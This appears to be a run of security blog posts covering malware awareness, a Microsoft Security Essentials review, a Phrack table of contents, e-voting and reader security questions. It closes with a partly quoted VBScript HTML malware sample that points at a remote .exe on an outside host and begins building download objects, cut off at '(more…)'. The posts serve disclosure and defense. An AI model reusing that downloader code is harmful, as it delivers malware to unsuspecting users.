The Girls, who have been having a grand time in recent years finding interesting high tech goodies that I never even knew existed, got me a Kindle for Christmas.  So, of course, I’m going to review the Kindle.

I had been putting off the idea of getting one for myself.  I do a lot of reading, but that’s primarily because I do a lot of reviewing, and for that you need the ability to make notes, and transfer said notes back to the computer for writing up.  So far, I haven’t seen an awful lot that convinces me the e-readers are there yet.

But, I do have to say that, right off the top, the idea of having 60 books (so far) in something that is lighter than a paperback definitely has its attractions.  So far I’ve been able to load the Bible, some tech articles, my own security dictionary, a dozen Sherlock Holmes stories, Don Quixote (both of which I have read), The Divine Comedy, War and Piece (both of which I intend to read–sometime), a fair amount of poetry, and an egalley for Bruce Schneier’s latest (sent along by his publicist).

Unfortunately, all this fun exploring has me somewhat behind in news and email, so I’ll have to start putting together my observations of the Kindle, itself, a bit later.

The Scientific American, no less, has published an article on malware.  Not that they don’t have every right, it’s just that the article is short on fact or help, and long on rather wild conjecture.

The author does have some points to make, even if he makes them very, very badly.

We, both as security professionals and as a society, don’t take malware seriously enough.  The security literature on the subject is appalling.  It is hard to find books on malware, even harder to find good ones, and well nigh impossible to find decent information in general security books.  The problem has been steadily growing since it was a vague academic topic, and has been ignored for so long that, now that it is a real problem, even most security experts have only a tenuous grasp of it.

Almost all reports do sound like paranoid thrillers.  Promoting the idea of shadowy genius figures in dark corners manipulating us at will, this engenders a kind of overall depression: we can’t possibly fight it, so we might was well not even try.  This attitude is further exacerbated but the dearth of information: we can’t even know what’s going on, so how can we even try to fight it?

It is getting more and more difficult to find malware, mostly because we are constantly creating new places for it to hide.  In the name of “user friendliness,” we are building ever more complex systems, with ever more crevices for the pumas to hide in.

Yes, then he goes off into wild speculation and gets all “Reflections on Trusting Trust” on us.  Which kind of loses the valid points.

A recent Twitter post by Team Cymru pointed at a (very brief) debate about the value of security awareness training.  It’s an issue that has concerned me for a long time.

I got interested in security starting with research into viruses and malware.  Early on, I did a lot of work reviewing the various available products.  In the responses I got to my efforts, one point was abundantly clear: everyone, almost without exception, was looking for the “perfect” antivirus.  Even though Fred Cohen had proven that such an animal could not possibly exist, everybody wanted something they could “set and forget.”

Notice two things.  The first is that perfect security doesn’t exist.  As (ISC)²’s marketing phrase has it, security transcends technology.  The second point is that people aren’t particularly keen on learning about security.  They fight against it.  They have to be motivated into it.  And that motivation tends to be individual and personal.

Which means security awareness training is hard, and individual, and therefore expensive.  Expensive means that companies are loath to try it, in any significant way.  Hundreds of thousands or millions of dollars can be spent on a raft of security technologies, but security awareness programs can only get a budget of a few thousand a year.  Which means they can’t be individual, which means they won’t work very well, which means companies aren’t willing to try them.

The default position people take is to resist security awareness.  They don’t want to know extraneous stuff.  They just want to get on with their jobs.  So, even if you were to produce a really good security awareness program, there would undoubtedly still be some who would resist to the end, and not learn.  They wouldn’t benefit from the program, and they would still make mistakes.  So security awareness training won’t be perfect, either.  Sorry about that.

However, I’ve noticed something over the years.  I get asked, by all my friends and acquaintances, for advice about virus protection, and home computer protection.  Some learn the ins and outs, the dangerous activities, the marks of a phishing email message.  They never ask me to clean their machines.  Some just ask about the “best” antiviral software.  Usually after they’ve asked me to clean off a computer.  I identify what they’ve got, and tell them how they got it.  You shouldn’t [do music sharing|do instant messaging|go to all those weird Websites|open attachments you receive] I tell them.  They always have reasons why they must do those things.  (Not very good reasons, mind you, just reasons.)

You know that old medical joke about “Doctor, it hurts when I do this” “Well, do do that”?  It’s not funny.

People ask me what antivirus program I use at home.  Very often I don’t use one, unless I’m testing something.  (At the moment I’m testing two, and I’m about ready to take both of them off, since both of them can be real nuisances at times.)  There are long periods where I run without any “protection.”  I know what not to do.  My wife knows what not to do.  (After all, she read my first book seven times over, while she was editing it.)  We don’t get infected.  Not even by “zero days” or “advanced persistent threats.”

Security technology isn’t perfect.  Security awareness training isn’t perfect.  However, at present, and for as long as I can remember, the emphasis has been on security technology.  We need to give awareness more of a try.

Is security awareness “worth it”?  Is security awareness “cost effective”?  Well, we’ve been spending quite a lot on security technologies (sometimes just piecemeal, unmanaged security technologies), and we haven’t got good security.  Three arguments in favour of at least trying security awareness spending:

1)  When you’ve got two areas of benefit, and you are reaching the limits of “diminishing returns” in one area, the place to put your further money is on the one you haven’t stressed.

2)  Security awareness is mostly about risk management.  Business management is mostly about risk management.  Security awareness can give you advantages in more than just security.

3)  Remember that the definition of insanity is trying the same thing over and over again, and expecting a different result.

The other night Gloria asked me what to do about securing the computer if I die first.  (Yes, we talk about those type of things.)  I really didn’t know what to tell her.  And told her that.

A decade ago, I would have had a list of things to do.  Actually, she knows that list: although she always considers herself ignorant about computers, she’s actually more savvy than most (and a lot more savvy than she gives herself credit for).  But these days I hardly know where to start.  You have to qualify every piece of advice you give, and you have to constantly keep up on the latest attacks and threats.  General classes don’t cut it any more.

This isn’t because the attackers are getting any more imaginative.  In general, they aren’t.  Recently a lot of companies (some, like RSA and Sony, very high profile) have been screaming about getting hit by APT (Advanced Persistent Threat) attacks.  What is APT?  Simply social engineering and malware.  Well, since malware has almost always had a social engineering component, I suppose it’s really only malware.  We’ve had malware for thirty years.  So what’s new?  Nothing.  The companies were sloppy.

What is happening is that all of information and communications technology is getting more and more complex.  Programs are tied into the operating system.  Nothing is clear cut.  The actual workings of the system are hidden from the user.  Hardware is virtual.  Networks are cloudy.  Gene Spafford mentioned this in a recent interview.  Since it was an interview, he really didn’t get a chance to expand on this point: the interviewer was more interested in trying to nail down who to blame for the situation.  Who is to blame?  Well, the vendors are creating sloppy systems: forfeiting security in the name of bells and whistles.  But that, of course, is because only a vanishingly small segment of the population is actually interested in security: everyone wants dancing pigs.

I’ve written before about complexity and security.  (And network complexity.)  But every day brings new examples.  Today, for example, Adobe has finally brought out an easier way to delete or manage Flash cookies.  Flash cookies are a particularly pernicious and tenacious form of cookie.  Those of you who think you are “up” on security may have set your browser to delete cookies.  Good.  Unfortunately, it doesn’t do a thing for Flash cookies.  So, Adobe has finally given us control over Flash cookies.  In version 10.3.  What version of Flash do you have?  Do you even know?  How would you find out?  It took me quite a while, and I know what I’m doing.  And, in spite of the fact that I’ve had numerous (annoying) Adobe updates recently, I don’t have 10.3.

I’m supposed to be a specialist not only in security, but in security awareness.  And the job is just getting overwhelming.

It’s really depressing.

What with twenty years experience in reviewing AV software, I figured I’d better try it out.

It’s not altogether terrible.  The fact that it’s free, and from Microsoft (and therefore promoted), might reduce the total level of infections, and that would be a good thing.

But even for free software, and from Microsoft, it’s pretty weird.

When I installed it, I did a “quick” scan.

That ran for over an hour on a machine with a drive that’s got about 70 Gb of material on it, mostly not programs.  At that point I hadn’t found out that you can exclude directories (more on that later), so it found my zoo.  It deleted nine copies of Sircam.

Lemme tell ya ’bout my zoo.  It’s got over 1500 files in it.  There are a lot of duplicate files (hence the nine copies of Sircam), and there are files in there that are not malware.  There are files which have had the executable file extensions changed.  But there are a great number of common, executable, dangerous pieces of malware in there, and the only thing MSE found was nine copies of Sircam.

(Which it deleted.  Without asking.  Personally, for me, that’s annoying.  It means I have to repopulate my zoo from backups.  But for most users, that’s probably a good thing.)

Now, when I went to repopulate my zoo, I, of course, opened the zoo directory with Windows Explorer.  And all kinds of bells and whistles went off.  As soon as I “looked” at the directory, the real-time component of MSE found more than the quick scan did.  That probably means the real-time scanner is fairly decent.  (In my situation it’s annoying, so I turned it off.  MSE is now annoyed at me, and continues to be annoyed, with big red flags on my task bar.)
MSE has four alert levels to categorize what it finds, and you have some options for setting the default actions.  The alert levels are severe (options: “Recommended action,” “Remove,” and “Quarantine”), high (options: “Recommended action,” “Remove,” and “Quarantine”), medium (options: “Recommended action,” “Remove,” “Quarantine,” and “Allow”), and low (options: “Recommended action,” “Remove,” “Quarantine,” and “Allow”).  Initially, everything is set at “Recommended action.”  I turned everything down to the lowest possible settings: I want information, not strip mining.  However, for most people it would seem to be reasonable to keep it at the default action, which seems to be removal for everything.
I don’t know where it puts the quarantined stuff.  It does have a directory at C:\Documents and Settings\All Users\Application Data\Microsoft Security Essentials, but no quarantined material appears to be there.

(I did try to find out more.  It does have help functions.  If you click on the “Help” button, it sends you to this site.  However, if you click on the link to explain the actions and alert levels, it sends you to this site.  If you examine those two URLs, they are different.  If you click on them, you go to the same place.  At that location, you can get some pages that offer you marketing bumpf, or watch a few videos.  There isn’t much help.)
You can exclude specific files and locations.  Personally, I find that extremely useful, and the only reason that I’d continue using MSE.  It does seem to work: I excluded my zoo before I did a full scan, and none of my zoo disappeared when I did the full scan.  However, for most users, the simple existence of that option could signal a loophole.  If I was a blackhat, first thing I’d do is find out how to exclude myself from the scanner.  (There is also an option to exclude certain file types.)

So I did a full scan.  That took over eight hours.  I don’t know exactly how long it took, I finally had to give up and leave it running.  MSE doesn’t report how long it took to do a scan, it only reports what it found.  (I suspect the total run was around ten or eleven hours.  MSE reports that a full scan can take up to an hour.)

While MSE is running it really bogs down the machine.  According to task manager it doesn’t take up much in the way of machine cycles, but the computer sure isn’t responsive while it’s on.
When I came back and found it had finished, the first thing it wanted me to do was send a bunch of suspect files to Microsoft.  The files were all from my email.  On the plus side, the files were all messages that reported suspect malware or Websites, so it’s possible that we could say MSE is doing a good job in scanning files and examining archives.  (On the other hand, every single message was from Sunbelt Software.  This could be coincidence, but it is also a fact that Sunbelt makes competing AV software, and was formerly associated with a company that Microsoft bought in its race to produce AV and anti-spyware components.)

Then I started to go through what Microsoft said it found, in order to determine what I had lost.

The first item on the list was rated severe.  Apparently I had failed to notice six copies of the EICAR test file on my machine.

Excuse me?  The EICAR test file?  A severe threat?  Microsoft, you have got to be kidding.  And the joke is not funny.

The EICAR test file is a test file.  If anyone doesn’t know what it is, read about it at EICAR, or at Wikipedia if you don’t trust EICAR.  It’s harmless.  Yes, a compatible scanner will report it, but only to show that your scanner is, in fact, working.

It shouldn’t delete or quarantine all copies it finds on the machine.

MSE also said it quarantined fifteen messages from my email for having JavaScript shell code.  Unfortunately, it didn’t say what they were, and I wasn’t sure I could get them back.  I don’t know why they were deleted, or what the trigger was.  MSE isn’t too big on reporting details.  I don’t know whether these messages were simply ones that contained some piece of generic JavaScript, and got boosted up to “severe” level.  Given the EICAR test file experience, I’m not inclined to give Microsoft the benefit of the doubt.

After some considerable work, I did find them.  They seemed to be the “suspect” messages that Microsoft wanted.  And when I tried to recover them, I found that MSE had not quarantined them: they were left in place.  So, at the very least, at times MSE lies to you.

(I guess I’d better add my email directory to places for MSE not to scan.)
MSE quarantined some old DOS utilities.  It quarantined a bunch of old virus simulators (the ones that show you screen displays, not actual infectors).  (Called them weird names, too.)

MSE quarantined Gibson Research’s DCOMbob.exe.  This is a tool for making sure that DCOM is disabled on your machine.  Since DCOM was the vector for the Blaster worm (among others), and is really hard to turn off under XP, I find this rather dangerous.

OK, final word is that I can use it.  I’ll want to protect certain areas before I do, but that shouldn’t be too much of a concern for most users.

You might want to make sure Microsoft isn’t reading your email …

0x01 Introduction
0x02 Phrack Prophile on The PaX Team
0x03 Phrack World News
0x04 Abusing the Objective C runtime
0x05 Backdooring Juniper Firewalls
0x06 Exploiting DLmalloc frees in 2009
0x07 Persistent BIOS infection
0x08 Exploiting UMA : FreeBSD kernel heap exploits
0x09 Exploiting TCP Persist Timer Infiniteness
0x0A Malloc Des-Maleficarum
0x0B A Real SMM Rootkit
0x0C Alphanumeric RISC ARM Shellcode
0x0D Power cell buffer overflow
0x0E Binary Mangling with Radare
0x0F Linux Kernel Heap Tempering Detection
0x10 Developing MacOSX Rootkits
0x11 How close are they of hacking your brain ?

You can check it out here.

Now we have something to keep us busy while the net neutrality debates are going on…

Did you vote in the last election? If not, you should have. If so, did it really count? I mean, literally, besides the aspect of consideration, did your ballot reach the total counter?

Many people who are part of a democracy and have this magical ‘right to vote’ (There is no amendment or part of the US constitution that directly states that Americans have the right to vote; only that you cannot be discriminated against via race or sex, and you must be at least 18 years of age. Look it up and you’ll see that it is only indirectly implied) probably question where their votes really go each and every time they leave the polls.

Furthermore, the most important question should be this: If election fraud is part of our elections, and we all know at least some part of it is, how can we prevent it? The simple answer is, we can’t. Electronic voting machines are a joke. Really, the security on these machines are inferior to the most common lock and key at the dollar store. Security on these ’secure’ election devices is comparable a Windows 98 (SE!) box running ZoneAlarm (pro!).

Wouldn’t it be nice and convenient to be able to vote via the Internet, without ever having to leave your home? Sure it would be. Safe though? Not in this century. If you have Netflix or any other movie service, you should add this to your queue: Hacking Democracy. Watch it, learn it, believe it. Do not hesitate at all to think its real. ITS BEEN PROVEN! Not a believer? Just wait around our next big election — we’ll see who wins.

New week a new question, in this case the question is a bit more generic and I believe raises a few dilemmas, feel free to take a shot at it:

Hi Experts,

Is it secure to just configure Cisco IPSEC/GRE site to site tunnel without firewall/IPS/IDS. The argument here is although it is internet facing, there is only a host to host routing between the routers and the default route goes to the tunnel. Am I right to say that it is technically secure since the router only route traffic between the designated routers?

Thanks in advance.

Regards,
J. O.

Another one for you this week, we especially liked XenoMuta’s answer to our previous one.
Lets go:

Dear SecuriTeam,

i am not sure if you are able to help us to find a solution for a special problem but i’ve tried everything and spent a lot of time in the internet without any achievement.

we want to export the content of multiple exchange servers from our branch offices into personal folders (.pst files) and import these informations into our exchange mail system. the main problem why we are not yet able to do this is that we want to scan the content for viruses, worms (if possible with multiple virus scanners) and for unwanted content like videos, music, executables and so on and this in a way that a real content scan would be done instead of just checking against the file extension. also all attached archives (zip, rar etc.) should be opened (if possible) and scanned for its content. if an attachment is found which cannot be scanned because of password protection or encryption or whatever reason this attachment or the complete mail should be deleted or moved to a quarantine area.

Thank your very much for your support

Best regards
J. B.
Germany

Once again - another security question from our readers to the security experts who read this blog:

I ran across your site looking for information regarding the security of PPTP. I then found the PPTP bruter program from THC. I am a small business owner. I am a VAR (value added reseller) of POS (point of sale) equipment. My POS equipment is usually windows PC’s running POS software. I install a SOHO router that is also a PPTP endpoint so I can VPN in and remotely administrator my clients systems.

I’m trying to find out how easy it would be for someone to hack my PPTP endpoint. Can you help me figure out how to test my router?

Thanks,

K. L.

A new question for you guys - you have been great answering the previous one:
—-
Hi I’m a bit new to java and socket programming.
Anyway I just wrote a client server socket program and I have an open port listening on my unix box.

I was told that this is vulnerable because now anyone could write a client side program to my open port and send in whatever command line they want.

I am not sure where to go about researching what security measures I need to put in place for socket programming.

From:
B.M
USA
—-

Dear Expert,

I am a Network Engineer at the University of Anonymous. I’m not sure if this is an irrelevant question, but here it is any way..

I want to have a Network Monitoring Software with the following characteristics

1 - I want to be able to monitor all the active workstations in each of the Labs.
2 - I want to have a list of trusted MAC addresses. I need this because I want to block any non-trusted device from accessing network resources. Exceptions might be given when the device is verified to be secure..
3 - I want to be able to detect any suspicious activities (pining, high traffic) and Block the associated IP address.

So please, tell me if there is any software of combination of software that enable me to do what I want..

I hope I will hear from you soon

Yours

M.M.

—

Our readers have been very helpful to person who wrote the previous post, I believe our readers have the answer in this case as well, and as in the previous case, further, the combined answer was way better than anything we could have provided.

So I am going to let our readers answer this interesting question. Readers - what do you say?

Dear Expert,

I know that a restricted user is less vulnerable to most exploits but is knowing that your users have restricted access enough of a reason NOT to patch? I am advocating that my IT support team update/ patch the following software for our end users; QuickTime, Java, Adobe Reader and Acrobat. Currently all of our installed versions have multiple known vulnerabilities. I am being told patching is unnecessary because 95% of our users have restricted user rights and therefore cannot be exploited.

Will you please clarify? I understand how restricted user rights increases security, but is that enough of a layer to justify not patching. When I inquired about scanning thumb drives, this same answer is given, “It is not necessary because the users have restricted rights.” Many of our users have access to confidential and sensitive data and I remain concerned. I really appreciate any assistance that you can provide on this issue. Thank you for your help.

Regards,
L.P
Anonymous University

A: I am going to let our readers answer this interesting question. Readers - what do you say?

Q:

I have a webserver where i’ve found several different php shell scripts and I’d like to know how they got there.  Are there known vulnerabilities that allow uploading of php files to a server?

I have several sites running on this server with several php script packages including…

Zencart
phpbb2

Any ideas or pointers will be appreciated!

A: Hi,

There are several vulnerabilities in both off the shelf products as well as custom PHP scripts that would allow “uploading”, in essence they don’t need to upload, they just need to get your PHP scripts to execute an arbitrary (outside) PHP script.

PHPbb has several:
http://www.securiteam.com/cgi-bin/htsearch?sort=score&words=phpbb

Listed as Code Execution, Arbitrary File Upload, etc.

While zencart has just one problem:
http://www.securiteam.com/cgi-bin/htsearch?sort=score&words=zen+cart

But that could be misleading, and just mean that the software is very uncommon.

Mr. Petko D. ‘Acrobat-Gmail’ Petkov has reported about very interesting Citrix issue:

When querying for public .ICA files (Independent Computing Architecture) you can do serious things in the remote system with this information. Opening Cmd.exe and listing the file system works etc. etc.

Report here and YouTube video of 1:28min here.
Googledork and Yahoodork(!) included, it appears there are many .mil and .gov sites. And hospitals too.
A real life example: A Finnish high school in Jyväskylä town fixed its problem in less than 20 minutes after receiving my e-mail this morning. Fine!

One of our customers have brought this HTML based malware to our attention:

[title][/title]
[head][/head]
[body]
[script language=”VBScript”]
on error resume next

‘ due to how ajax works, the file MUST be within the same local domain
dl = “http://grupo-arroba.by.ru/grupo.exe”

‘ create adodbstream object
Set df = document.createElement(”object”)
df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″
str=”Microsoft.XMLHTTP”
Set x = df.CreateObject(str,”")
(more…)